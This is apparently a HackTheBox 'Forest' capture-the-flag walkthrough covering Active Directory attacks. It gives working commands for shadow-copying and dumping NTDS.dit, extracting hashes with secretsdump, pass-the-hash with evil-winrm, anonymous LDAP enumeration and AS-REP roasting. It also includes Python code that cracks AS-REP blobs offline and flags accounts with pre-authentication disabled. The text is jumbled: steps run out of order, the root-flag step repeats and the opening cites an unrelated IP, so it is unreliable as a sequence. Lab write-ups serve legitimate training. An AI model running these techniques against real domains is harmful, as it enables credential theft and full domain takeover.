Best | Forest Hackthebox Walkthrough

Visiting http://10.10.10.74 in a web browser reveals a default Apache web server page. No specific information can be gathered from this page.

Can diskshadow be run from a WinRM session at all? Yes. It is an interactive console tool by default, but it also accepts a script file via /s, which is what makes it usable from evil-winrm.

Step A: Upload a script

Create a file diskshadow.txt locally:

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:

Transfer it to the target (using evil-winrm upload):

upload diskshadow.txt

Step B: Execute DiskShadow

diskshadow /s diskshadow.txt

Z: now exposes a read-only shadow copy of C:, so files that are locked on the live volume (NTDS.dit in particular) can be copied from it. Two practical caveats: run diskshadow from a directory the account can write to, and remember that creating a shadow copy is a privileged operation (local admin or Backup Operators). The next step also relies on SeBackupPrivilege, so check the account's privileges before spending time on this path.

Step C: Copy NTDS.dit and SYSTEM Hive

robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system system.save

Step D: Download & Extract Hashes

Pull ntds.dit and system.save back with evil-winrm's download command, then from your Kali machine:

impacket-secretsdump -ntds ntds.dit -system system.save LOCAL

Output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

The first hash field (aad3b435...) is just the empty LM hash; the NT hash 32693b11... is the one that matters. Crack it offline or, faster, use it directly with pass-the-hash.

Step E: Pass-the-Hash to Admin

evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Navigate to C:\Users\Administrator\Desktop and grab root.txt.


We are logged in as a service account, but we need Administrator access to read the root flag or fully compromise the domain.

This is the critical weakness of Forest: the DC accepts anonymous (unauthenticated) LDAP binds, so the whole directory can be enumerated without any credentials.

ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local"

Result: hundreds of entries, covering users, groups, computers and containers. We only need the user accounts.

Extract all users:

ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local" "(&(objectCategory=person)(objectClass=user))" sAMAccountName | grep -i "^sAMAccountName" | awk '{print $2}' > users.txt

The users.txt file looks like this:

Guest
DefaultAccount
Administrator
sebastien
lucinda
andrea
santi
...

This is our attack surface.


Use evil-winrm again with the Administrator NT hash from the secretsdump output:

evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Now list the root directory:

cd C:\Users\Administrator\Desktop
type root.txt

Root flag obtained.


Now we have a list of roughly 30 candidate usernames. Rather than password spraying (noisy, and a lockout risk), we try AS-REP Roasting first.

What is it?
Kerberos normally requires pre-authentication: before the KDC issues anything, the client proves it knows the password by sending a timestamp encrypted with the password-derived key. If an account has DONT_REQ_PREAUTH set in userAccountControl, the KDC skips that check and answers an AS-REQ for that user with an AS-REP whose encrypted part is keyed with the user's password-derived key (for RC4-HMAC, etype 23, that key is the NT hash). Anyone who can name the account, with no credentials at all, can fetch that blob and crack it offline like a password hash (hashcat mode 18200 for etype 23).
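The mechanism above, worked through as an added example (my code, not the walkthrough's and not impacket's): it builds an AS-REP enc-part the way a KDC would for an account with pre-auth disabled, formats it as the $krb5asrep$23$ line GetNPUsers would print, and then recovers the password from a small wordlist using nothing but that blob. The username, realm, password, confounder and enc-part contents are constructed stand-ins; the RC4-HMAC arithmetic follows RFC 4757 and the NT hash is MD4 over the UTF-16LE password.

```python
"""AS-REP roasting, start to finish and offline: why disabling Kerberos
pre-authentication leaves an account's password crackable.

Added example, not part of the original walkthrough. RC4-HMAC (etype 23)
from RFC 4757 is implemented here in pure Python so nothing needs a DC; the
enc-part contents, confounder, wordlist and password are all constructed
(a real enc-part is a DER-encoded EncASRepPart, not this stand-in text)."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks MD4 on OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (function, word order, shift amounts, additive constant)
        (f, tuple(range(16)), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = rotl((a + func(b, c, d) + x[j] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c                  # rotate registers
        a, b, c, d = [(v + w) & MASK32 for v, w in zip((a, b, c, d), (aa, bb, cc, dd))]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 it is also the Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


ASREP_USAGE = 8   # RFC 4120 usage 3 (AS-REP enc-part); RC4-HMAC maps it to 8


def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757 encrypt: returns (checksum, ciphertext) exactly as the KDC does."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def rc4_hmac_decrypt(key, usage, checksum, ciphertext):
    """Returns confounder||plaintext if the checksum verifies, else None."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, ciphertext)
    if hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        return data
    return None


def hashcat_line(user, realm, checksum, ciphertext):
    """hashcat -m 18200 format, the same shape GetNPUsers -format hashcat emits."""
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ciphertext.hex()}"


def crack_asrep(line, wordlist):
    """Offline guess-and-verify: the only secret in the blob is the user's key."""
    user_part = line.split("$", 3)[3]                   # "user@REALM:checksum$edata"
    checksum_hex, edata_hex = user_part.split(":", 1)[1].split("$", 1)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), ASREP_USAGE, checksum, edata):
            return candidate
    return None


# Constructed sample: not the box's real password, confounder or AS-REP.
SAMPLE_USER, SAMPLE_REALM = "svc-alfresco", "HTB.LOCAL"
SAMPLE_PASSWORD = "Summer2019!"
SAMPLE_CONFOUNDER = bytes(range(8))                    # the KDC uses 8 random bytes
SAMPLE_PLAINTEXT = b"EncASRepPart stand-in: session key, times, sname"


def sample_asrep_line():
    """What the KDC would hand anyone asking for this account, with no password."""
    checksum, edata = rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), ASREP_USAGE,
                                       SAMPLE_PLAINTEXT, SAMPLE_CONFOUNDER)
    return hashcat_line(SAMPLE_USER, SAMPLE_REALM, checksum, edata)
```

Against the real box you do not build the blob yourself: impacket-GetNPUsers htb.local/ -usersfile users.txt -dc-ip 10.10.10.161 -format hashcat -no-pass requests one AS-REP per listed user and prints the same $krb5asrep$23$ lines for every account that has pre-auth disabled, and hashcat -m 18200 does what crack_asrep does, only far faster. Note the key usage number: RFC 4120 assigns usage 3 to the AS-REP enc-part, but RC4-HMAC substitutes 8 (RFC 4757), which is why the code derives K1 from 8; using 3 would make every candidate fail verification.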

Use enum4linux or impacket-GetADUsers to list domain users (the -all switch matters: without it GetADUsers only returns accounts that have a mail attribute; press Enter at the password prompt to bind anonymously):

impacket-GetADUsers -all -dc-ip 10.10.10.161 htb.local/

Alternatively, use kerbrute to enumerate valid usernames from a wordlist (it works from Kerberos AS-REQ responses, so it does not lock accounts out):

kerbrute userenum --dc 10.10.10.161 -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

But for efficiency, we can also use ldapsearch:

ldapsearch -x -H ldap://10.10.10.161 -b "CN=Users,DC=htb,DC=local" | grep sAMAccountName

Users found: svc-alfresco, sebastien, lucinda, andy, mark, santi.
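A more robust way to turn an ldapsearch dump into a user list, serving both the grep | awk extraction earlier on this page and the CN=Users query here. This is an added example (my code, not the walkthrough's); the LDIF it parses is constructed to resemble the anonymous dump, using the page's usernames with made-up attribute values. It handles what the one-liner does not: folded continuation lines, base64-encoded values, and group or computer objects that also carry an sAMAccountName; it also reads userAccountControl, so accounts with DONT_REQ_PREAUTH set are flagged directly.

```python
"""Parse ldapsearch (LDIF) output into objects instead of grepping it.

Added example, not from the original walkthrough. SAMPLE_LDIF is constructed
to resemble Forest's anonymous dump (usernames taken from the page, attribute
values made up) and deliberately includes the three things the grep | awk
pipeline mishandles: folded continuation lines, base64 '::' values, and
groups and computers, which also carry sAMAccountName."""
import base64

# userAccountControl bits (ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000      # the AS-REP roasting flag

SAMPLE_LDIF = f"""\
# extended LDIF
# base <DC=htb,DC=local> with scope subtree

# sebastien, Users, htb.local
dn: CN=sebastien,CN=Users,DC=htb,DC=local
objectClass: user
sAMAccountName: sebastien
userAccountControl: 66048

# svc-alfresco, Service Accounts, htb.local
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
objectClass: user
sAMAccountName: svc-alfresco
description: Alfresco service account. This constructed description is long en
 ough that ldapsearch folds it onto a continuation line
userAccountControl: 4260352

# Domain Admins, Users, htb.local
dn: CN=Domain Admins,CN=Users,DC=htb,DC=local
objectClass: group
sAMAccountName: Domain Admins

# FOREST, Domain Controllers, htb.local
dn: CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
objectClass: user
objectClass: computer
sAMAccountName: FOREST$
userAccountControl: 532480

# non-ASCII value: ldapsearch emits it base64-encoded after a double colon
dn: CN=rene,CN=Users,DC=htb,DC=local
objectClass: user
sAMAccountName:: {base64.b64encode("rené".encode()).decode()}
userAccountControl: 512

# search result
search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF record (RFC 2849)."""
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:          # continuation line
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)
    entries, cur = [], {}
    for line in unfolded:
        if line.startswith("#"):
            continue
        if not line:                                    # blank line ends a record
            if cur:
                entries.append(cur)
            cur = {}
            continue
        attr, sep, raw = line.partition(":")
        if not sep:
            continue
        if raw.startswith(":"):                         # "attr:: <base64>"
            value = base64.b64decode(raw[1:].strip()).decode("utf-8")
        else:
            value = raw.strip()
        cur.setdefault(attr, []).append(value)
    if cur:
        entries.append(cur)
    return entries


def domain_users(entries):
    """Real user objects only: drop groups, computer accounts and the trailer."""
    users = []
    for e in entries:
        classes = {c.lower() for c in e.get("objectClass", [])}
        if "dn" not in e or "user" not in classes or "computer" in classes:
            continue
        uac = int(e.get("userAccountControl", ["0"])[0])
        users.append({"name": e["sAMAccountName"][0],
                      "disabled": bool(uac & UF_ACCOUNTDISABLE),
                      "no_preauth": bool(uac & UF_DONT_REQUIRE_PREAUTH)})
    return users


def naive_names(text):
    """The grep -i sAMAccountName | awk '{print $2}' pipeline, for comparison."""
    return [l.split()[1] for l in text.splitlines()
            if "samaccountname" in l.lower() and len(l.split()) > 1]


def asrep_candidates(text):
    """Enabled accounts with pre-auth disabled: feed these to GetNPUsers."""
    return [u["name"] for u in domain_users(parse_ldif(text))
            if u["no_preauth"] and not u["disabled"]]
```

To use it on real output, save the full ldapsearch dump (no grep), read it into a string and call asrep_candidates on it; anything it returns goes straight into the AS-REP roasting step. naive_names(SAMPLE_LDIF) shows what the pipeline would have produced from the same input: "Domain" (half a group name), "FOREST$" (the DC's machine account) and a base64 string where the real username should be.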